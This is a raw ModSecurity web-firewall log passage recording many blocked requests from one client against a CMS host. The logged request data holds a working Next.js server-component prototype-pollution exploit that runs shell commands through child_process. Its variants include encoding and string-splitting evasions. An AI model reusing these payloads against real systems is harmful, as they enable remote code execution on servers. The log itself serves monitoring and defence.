Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJmxbxQSOrq_iRTM7dpDAAAAQQ"] [Sun Apr 05 15:42:29.174631 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:41144] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJmxbxQSOrq_iRTM7dpCgAAAQI"] [Sun Apr 05 15:42:29.175012 2026] [:error] [pid 31198:tid 31252] [client 172.94.9.253:41138] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJmxTT5TgrBR8xRnfXA0gAAAUA"] [Sun Apr 05 15:42:29.176627 2026] [:error] [pid 13019:tid 13249] [client 172.94.9.253:41168] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJmxbxQSOrq_iRTM7dpCwAAAQk"] [Sun Apr 05 15:42:29.277371 2026] [:error] [pid 23077:tid 23088] [client 172.94.9.253:41264] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJmxZc83uMXRUE9zvQSjQAAAcU"] [Sun Apr 05 15:42:29.277386 2026] [:error] [pid 23077:tid 23094] [client 172.94.9.253:41272] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJmxZc83uMXRUE9zvQSjgAAAcs"] [Sun Apr 05 15:42:29.277610 2026] [:error] [pid 1306:tid 1341] [client 172.94.9.253:41258] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJmxYRhslBlnapNAUOXkwAAABg"] [Sun Apr 05 15:42:29.277801 2026] [:error] [pid 23077:tid 23087] [client 172.94.9.253:41278] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJmxZc83uMXRUE9zvQSjwAAAcQ"] [Sun Apr 05 15:42:29.278544 2026] [:error] [pid 23077:tid 23103] [client 172.94.9.253:41244] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJmxZc83uMXRUE9zvQSkAAAAdQ"] [Sun Apr 05 15:42:29.279240 2026] [:error] [pid 23077:tid 23086] [client 172.94.9.253:41218] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJmxZc83uMXRUE9zvQSkQAAAcM"] [Sun Apr 05 15:42:29.279853 2026] [:error] [pid 1308:tid 1356] [client 172.94.9.253:41208] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJmxSj-HYEhJWFlG6ErgwAAAEs"] [Sun Apr 05 15:42:29.287979 2026] [:error] [pid 23077:tid 23084] [client 172.94.9.253:41262] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJmxZc83uMXRUE9zvQSkgAAAcE"] [Sun Apr 05 15:42:29.296940 2026] [:error] [pid 23077:tid 23107] [client 172.94.9.253:41230] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJmxZc83uMXRUE9zvQSkwAAAdg"] [Sun Apr 05 15:42:29.326840 2026] [:error] [pid 1309:tid 1389] [client 172.94.9.253:41260] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxT-XKUNJEHmNu6G7uQAAAJI"] [Sun Apr 05 15:42:29.391109 2026] [:error] [pid 23077:tid 23100] [client 172.94.9.253:41322] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJmxZc83uMXRUE9zvQSlAAAAdE"] [Sun Apr 05 15:42:29.392512 2026] [:error] [pid 1503:tid 1532] [client 172.94.9.253:41348] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJmxUI7AjfUQYCN-J7DYwAAANQ"] [Sun Apr 05 15:42:29.393795 2026] [:error] [pid 23077:tid 23085] [client 172.94.9.253:41290] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJmxZc83uMXRUE9zvQSlQAAAcI"] [Sun Apr 05 15:42:29.396170 2026] [:error] [pid 31198:tid 31258] [client 172.94.9.253:41280] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJmxTT5TgrBR8xRnfXA1AAAAUY"] [Sun Apr 05 15:42:29.396318 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:41308] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJmxbxQSOrq_iRTM7dpEAAAARI"] [Sun Apr 05 15:42:29.416381 2026] [:error] [pid 1503:tid 1519] [client 172.94.9.253:41298] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJmxUI7AjfUQYCN-J7DZAAAAMo"] [Sun Apr 05 15:42:29.416576 2026] [:error] [pid 31198:tid 31264] [client 172.94.9.253:41286] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] 